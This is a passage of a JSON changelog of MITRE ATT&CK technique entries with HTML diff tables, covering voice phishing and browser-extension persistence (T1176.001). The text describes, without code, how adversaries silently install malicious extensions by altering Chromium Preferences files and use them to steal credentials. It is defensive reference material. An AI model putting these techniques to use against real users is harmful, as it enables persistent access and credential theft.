nowrap=\"nowrap\">by&nbsp;adversaries,&nbsp;hired&nbsp;call&nbsp;centers,&nbsp;or&nbsp;even&nbsp;automated&nbsp;via&nbsp;ro</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lls.&nbsp;Voice&nbsp;phishers&nbsp;may&nbsp;spoof&nbsp;their&nbsp;phone&nbsp;number&nbsp;while&nbsp;also&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">bocalls.&nbsp;Voice&nbsp;phishers&nbsp;may&nbsp;spoof&nbsp;their&nbsp;phone&nbsp;number&nbsp;while&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">posing&nbsp;as&nbsp;a&nbsp;trusted&nbsp;entity,&nbsp;such&nbsp;as&nbsp;a&nbsp;business&nbsp;partner&nbsp;or&nbsp;te</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lso&nbsp;posing&nbsp;as&nbsp;a&nbsp;trusted&nbsp;entity,&nbsp;such&nbsp;as&nbsp;a&nbsp;business&nbsp;partner&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">chnical&nbsp;support&nbsp;staff.(Citation:&nbsp;BOA&nbsp;Telephone&nbsp;Scams)&nbsp;&nbsp;Victi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;technical&nbsp;support&nbsp;staff.(Citation:&nbsp;BOA&nbsp;Telephone&nbsp;Scams)&nbsp;&nbsp;V</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ms&nbsp;may&nbsp;also&nbsp;receive&nbsp;phishing&nbsp;messages&nbsp;that&nbsp;direct&nbsp;them&nbsp;to&nbsp;ca</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ictims&nbsp;may&nbsp;also&nbsp;receive&nbsp;phishing&nbsp;messages&nbsp;that&nbsp;direct&nbsp;them&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ll&nbsp;a&nbsp;phone&nbsp;number&nbsp;(\"callback&nbsp;phishing\")&nbsp;where&nbsp;the&nbsp;adversary&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">o&nbsp;call&nbsp;a&nbsp;phone&nbsp;number&nbsp;(\"callback&nbsp;phishing\")&nbsp;where&nbsp;the&nbsp;advers</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">attempts&nbsp;to&nbsp;collect&nbsp;confidential&nbsp;information.(Citation:&nbsp;Aver</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ary&nbsp;attempts&nbsp;to&nbsp;collect&nbsp;confidential&nbsp;information.(Citation:&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tium&nbsp;callback&nbsp;phishing)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;use&nbsp;informatio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Avertium&nbsp;callback&nbsp;phishing)&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;also&nbsp;use&nbsp;inform</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;from&nbsp;previous&nbsp;reconnaissance&nbsp;efforts&nbsp;(ex:&nbsp;[Search&nbsp;Open&nbsp;Web</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;from&nbsp;previous&nbsp;reconnaissance&nbsp;efforts&nbsp;(ex:&nbsp;[Search&nbsp;Open</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sites/Domains](https://attack.mitre.org/techniques/T1593)&nbsp;or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Websites/Domains](https://attack.mitre.org/techniques/T1593</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;[Search&nbsp;Victim-Owned&nbsp;Websites](https://attack.mitre.org/tec</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">)&nbsp;or&nbsp;[Search&nbsp;Victim-Owned&nbsp;Websites](https://attack.mitre.org</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hniques/T1594))&nbsp;to&nbsp;tailor&nbsp;pretexts&nbsp;to&nbsp;be&nbsp;even&nbsp;more&nbsp;persuasiv</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/techniques/T1594))&nbsp;to&nbsp;tailor&nbsp;pretexts&nbsp;to&nbsp;be&nbsp;even&nbsp;more&nbsp;persu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;and&nbsp;believable&nbsp;for&nbsp;the&nbsp;victim.</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">asive&nbsp;and&nbsp;believable&nbsp;for&nbsp;the&nbsp;victim.</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0886: Detection of Spearphishing Voice"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--278716b1-61ce-4a74-8d17-891d0c494101",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-03-30 22:12:27.799000+00:00",
                    "modified": "2025-09-22 17:00:42.545000+00:00",
                    "name": "Browser Extensions",
                    "description": "Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to and customize aspects of internet browsers. They can be installed directly via a local file or custom URL or through a browser's app store - an official online platform where users can browse, install, and manage extensions for a specific web browser. Extensions generally inherit the web browser's permissions previously granted.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) \n \nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary-controlled server or manipulate the mobile configuration file to silently install additional extensions. \n\nAdversaries may abuse how chromium-based browsers load extensions by modifying or replacing the Preferences and/or Secure Preferences files to silently install malicious extensions. When the browser is not running, adversaries can alter these files, ensuring the extension is loaded, granted desired permissions, and will persist in browser sessions. This method does not require user consent and extensions are silently loaded in the background from disk or from the browser's trusted store.(Citation: Pulsedive)\n  \nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install configuration profiles; however, <code>.mobileconfig</code> files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) \n \nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) \n\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Stealth](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1176/001",
                            "external_id": "T1176.001"
                        },
                        {
                            "source_name": "Pulsedive",
                            "description": "  Pulsedive Threat Research. (2025, March 21). Rilide - An Information Stealing Browser Extension. Retrieved September 22, 2025.",
                            "url": "https://blog.pulsedive.com/rilide-an-information-stealing-browser-extension/"
                        },
                        {
                            "source_name": "Chrome Extension Crypto Miner",
                            "description": "Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017.",
                            "url": "https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/"
                        },
                        {
                            "source_name": "xorrior chrome extensions macOS",
                            "description": "Chris Ross. (2019, February 8). No Place Like Chrome. Retrieved April 27, 2021.",
                            "url": "https://www.xorrior.com/No-Place-Like-Chrome/"
                        },
                        {
                            "source_name": "Chrome Extensions Definition",
                            "description": "Chrome. (n.d.). What are Extensions?. Retrieved November 16, 2017.",
                            "url": "https://developer.chrome.com/extensions"
                        },
                        {
                            "source_name": "ICEBRG Chrome Extensions",
                            "description": "De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.",
                            "url": "https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses"
                        },
                        {
                            "source_name": "Malicious Chrome Extension Numbers",
                            "description": "Jagpal, N., et al. (2015, August). Trends and Lessons from Three Years Fighting Malicious Extensions. Retrieved November 17, 2017.",
                            "url": "https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf"
                        },
                        {
                            "source_name": "Chrome Extension C2 Malware",
                            "description": "Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved September 12, 2024.",
                            "url": "https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/"
                        },
                        {
                            "source_name": "Catch All Chrome Extension",
                            "description": "Marinho, R. (n.d.). \"Catch-All\" Google Chrome Malicious Extension Steals All Posted Data. Retrieved November 16, 2017.",
                            "url": "https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/https:/threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/)"
                        },
                        {
                            "source_name": "Banker Google Chrome Extension Steals Creds",
                            "description": "Marinho, R. (n.d.). (Banker(GoogleChromeExtension)).targeting. Retrieved November 18, 2017.",
                            "url": "https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/"
                        },
                        {
                            "source_name": "Browser Adrozek",
                            "description": "Microsoft Threat Intelligence. (2020, December 10). Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers. Retrieved February 26, 2024.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2020/12/10/widespread-malware-campaign-seeks-to-silently-inject-ads-into-search-results-affects-multiple-browsers/"
                        },
                        {
                            "source_name": "Browers FriarFox",
                            "description": "Raggi, Michael. Proofpoint Threat Research Team. (2021, February 25). TA413 Leverages New FriarFox Browser Extension to Target the Gmail Accounts of Global Tibetan Organizations. Retrieved November 17, 2024.",
                            "url": "https://www.proofpoint.com/uk/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global"
                        },
                        {
                            "source_name": "Stantinko Botnet",
                            "description": "Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware campaign operating covertly since 2012. Retrieved November 16, 2017.",
                            "url": "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/"
                        },
                        {
                            "source_name": "Wikipedia Browser Extension",
                            "description": "Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.",
                            "url": "https://en.wikipedia.org/wiki/Browser_extension"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Gordon Long, LegioX/Zoom, asaurusrex"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows",
                        "macOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['description']\": {\"new_value\": \"Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to and customize aspects of internet browsers. They can be installed directly via a local file or custom URL or through a browser's app store - an official online platform where users can browse, install, and manage extensions for a specific web browser. Extensions generally inherit the web browser's permissions previously granted.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) \\n \\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary-controlled server or manipulate the mobile configuration file to silently install additional extensions. \\n\\nAdversaries may abuse how chromium-based browsers load extensions by modifying or replacing the Preferences and/or Secure Preferences files to silently install malicious extensions. When the browser is not running, adversaries can alter these files, ensuring the extension is loaded, granted desired permissions, and will persist in browser sessions. This method does not require user consent and extensions are silently loaded in the background from disk or from the browser's trusted store.(Citation: Pulsedive)\\n  \\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install configuration profiles; however, <code>.mobileconfig</code> files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) \\n \\nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) \\n\\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Stealth](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) \", \"old_value\": \"Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to and customize aspects of internet browsers. They can be installed directly via a local file or custom URL or through a browser's app store - an official online platform where users can browse, install, and manage extensions for a specific web browser. Extensions generally inherit the web browser's permissions previously granted.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) \\n \\nMalicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary-controlled server or manipulate the mobile configuration file to silently install additional extensions. \\n\\nAdversaries may abuse how chromium-based browsers load extensions by modifying or replacing the Preferences and/or Secure Preferences files to silently install malicious extensions. When the browser is not running, adversaries can alter these files, ensuring the extension is loaded, granted desired permissions, and will persist in browser sessions. This method does not require user consent and extensions are silently loaded in the background from disk or from the browser's trusted store.(Citation: Pulsedive)\\n  \\nPrevious to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install configuration profiles; however, <code>.mobileconfig</code> files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) \\n \\nOnce the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) \\n\\nThere have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) \", \"diff\": \"--- \\n+++ \\n@@ -8,4 +8,4 @@\\n  \\n Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) \\n \\n-There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) \\n+There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Stealth](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek) \"}}}",
                    "previous_version": "1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to32__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to32__0\"><a href=\"#difflib_chg_to32__top\">t</a></td><td class=\"diff_header\" id=\"from32_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;abuse&nbsp;internet&nbsp;browser&nbsp;extensions&nbsp;to&nbsp;establi</td><td class=\"diff_next\"><a href=\"#difflib_chg_to32__top\">t</a></td><td class=\"diff_header\" id=\"to32_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;abuse&nbsp;internet&nbsp;browser&nbsp;extensions&nbsp;to&nbsp;establi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sh&nbsp;persistent&nbsp;access&nbsp;to&nbsp;victim&nbsp;systems.&nbsp;Browser&nbsp;extensions&nbsp;o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sh&nbsp;persistent&nbsp;access&nbsp;to&nbsp;victim&nbsp;systems.&nbsp;Browser&nbsp;extensions&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;plugins&nbsp;are&nbsp;small&nbsp;programs&nbsp;that&nbsp;can&nbsp;add&nbsp;functionality&nbsp;to&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;plugins&nbsp;are&nbsp;small&nbsp;programs&nbsp;that&nbsp;can&nbsp;add&nbsp;functionality&nbsp;to&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nd&nbsp;customize&nbsp;aspects&nbsp;of&nbsp;internet&nbsp;browsers.&nbsp;They&nbsp;can&nbsp;be&nbsp;insta</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nd&nbsp;customize&nbsp;aspects&nbsp;of&nbsp;internet&nbsp;browsers.&nbsp;They&nbsp;can&nbsp;be&nbsp;insta</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lled&nbsp;directly&nbsp;via&nbsp;a&nbsp;local&nbsp;file&nbsp;or&nbsp;custom&nbsp;URL&nbsp;or&nbsp;through&nbsp;a&nbsp;br</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">lled&nbsp;directly&nbsp;via&nbsp;a&nbsp;local&nbsp;file&nbsp;or&nbsp;custom&nbsp;URL&nbsp;or&nbsp;through&nbsp;a&nbsp;br</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">owser's&nbsp;app&nbsp;store&nbsp;-&nbsp;an&nbsp;official&nbsp;online&nbsp;platform&nbsp;where&nbsp;users&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">owser's&nbsp;app&nbsp;store&nbsp;-&nbsp;an&nbsp;official&nbsp;online&nbsp;platform&nbsp;where&nbsp;users&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">can&nbsp;browse,&nbsp;install,&nbsp;and&nbsp;manage&nbsp;extensions&nbsp;for&nbsp;a&nbsp;specific&nbsp;we</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">can&nbsp;browse,&nbsp;install,&nbsp;and&nbsp;manage&nbsp;extensions&nbsp;for&nbsp;a&nbsp;specific&nbsp;we</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">b&nbsp;browser.&nbsp;Extensions&nbsp;generally&nbsp;inherit&nbsp;the&nbsp;web&nbsp;browser's&nbsp;pe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">b&nbsp;browser.&nbsp;Extensions&nbsp;generally&nbsp;inherit&nbsp;the&nbsp;web&nbsp;browser's&nbsp;pe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rmissions&nbsp;previously&nbsp;granted.(Citation:&nbsp;Wikipedia&nbsp;Browser&nbsp;Ex</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rmissions&nbsp;previously&nbsp;granted.(Citation:&nbsp;Wikipedia&nbsp;Browser&nbsp;Ex</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tension)(Citation:&nbsp;Chrome&nbsp;Extensions&nbsp;Definition)&nbsp;&nbsp;&nbsp;&nbsp;Maliciou</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tension)(Citation:&nbsp;Chrome&nbsp;Extensions&nbsp;Definition)&nbsp;&nbsp;&nbsp;&nbsp;Maliciou</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;extensions&nbsp;can&nbsp;be&nbsp;installed&nbsp;into&nbsp;a&nbsp;browser&nbsp;through&nbsp;malicio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;extensions&nbsp;can&nbsp;be&nbsp;installed&nbsp;into&nbsp;a&nbsp;browser&nbsp;through&nbsp;malicio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">us&nbsp;app&nbsp;store&nbsp;downloads&nbsp;masquerading&nbsp;as&nbsp;legitimate&nbsp;extensions</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">us&nbsp;app&nbsp;store&nbsp;downloads&nbsp;masquerading&nbsp;as&nbsp;legitimate&nbsp;extensions</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;through&nbsp;social&nbsp;engineering,&nbsp;or&nbsp;by&nbsp;an&nbsp;adversary&nbsp;that&nbsp;has&nbsp;al</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;through&nbsp;social&nbsp;engineering,&nbsp;or&nbsp;by&nbsp;an&nbsp;adversary&nbsp;that&nbsp;has&nbsp;al</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ready&nbsp;compromised&nbsp;a&nbsp;system.&nbsp;Security&nbsp;can&nbsp;be&nbsp;limited&nbsp;on&nbsp;brows</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ready&nbsp;compromised&nbsp;a&nbsp;system.&nbsp;Security&nbsp;can&nbsp;be&nbsp;limited&nbsp;on&nbsp;brows</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">er&nbsp;app&nbsp;stores,&nbsp;so&nbsp;it&nbsp;may&nbsp;not&nbsp;be&nbsp;difficult&nbsp;for&nbsp;malicious&nbsp;exte</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">er&nbsp;app&nbsp;stores,&nbsp;so&nbsp;it&nbsp;may&nbsp;not&nbsp;be&nbsp;difficult&nbsp;for&nbsp;malicious&nbsp;exte</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nsions&nbsp;to&nbsp;defeat&nbsp;automated&nbsp;scanners.(Citation:&nbsp;Malicious&nbsp;Chr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nsions&nbsp;to&nbsp;defeat&nbsp;automated&nbsp;scanners.(Citation:&nbsp;Malicious&nbsp;Chr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ome&nbsp;Extension&nbsp;Numbers)&nbsp;Depending&nbsp;on&nbsp;the&nbsp;browser,&nbsp;adversaries</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ome&nbsp;Extension&nbsp;Numbers)&nbsp;Depending&nbsp;on&nbsp;the&nbsp;browser,&nbsp;adversaries</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;may&nbsp;also&nbsp;manipulate&nbsp;an&nbsp;extension's&nbsp;update&nbsp;url&nbsp;to&nbsp;install&nbsp;up</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;may&nbsp;also&nbsp;manipulate&nbsp;an&nbsp;extension's&nbsp;update&nbsp;url&nbsp;to&nbsp;install&nbsp;up</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dates&nbsp;from&nbsp;an&nbsp;adversary-controlled&nbsp;server&nbsp;or&nbsp;manipulate&nbsp;the&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">dates&nbsp;from&nbsp;an&nbsp;adversary-controlled&nbsp;server&nbsp;or&nbsp;manipulate&nbsp;the&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mobile&nbsp;configuration&nbsp;file&nbsp;to&nbsp;silently&nbsp;install&nbsp;additional&nbsp;ext</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mobile&nbsp;configuration&nbsp;file&nbsp;to&nbsp;silently&nbsp;install&nbsp;additional&nbsp;ext</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ensions.&nbsp;&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;abuse&nbsp;how&nbsp;chromium-based&nbsp;browsers</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ensions.&nbsp;&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;abuse&nbsp;how&nbsp;chromium-based&nbsp;browsers</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;load&nbsp;extensions&nbsp;by&nbsp;modifying&nbsp;or&nbsp;replacing&nbsp;the&nbsp;Preferences&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;load&nbsp;extensions&nbsp;by&nbsp;modifying&nbsp;or&nbsp;replacing&nbsp;the&nbsp;Preferences&nbsp;a</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nd/or&nbsp;Secure&nbsp;Preferences&nbsp;files&nbsp;to&nbsp;silently&nbsp;install&nbsp;malicious</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 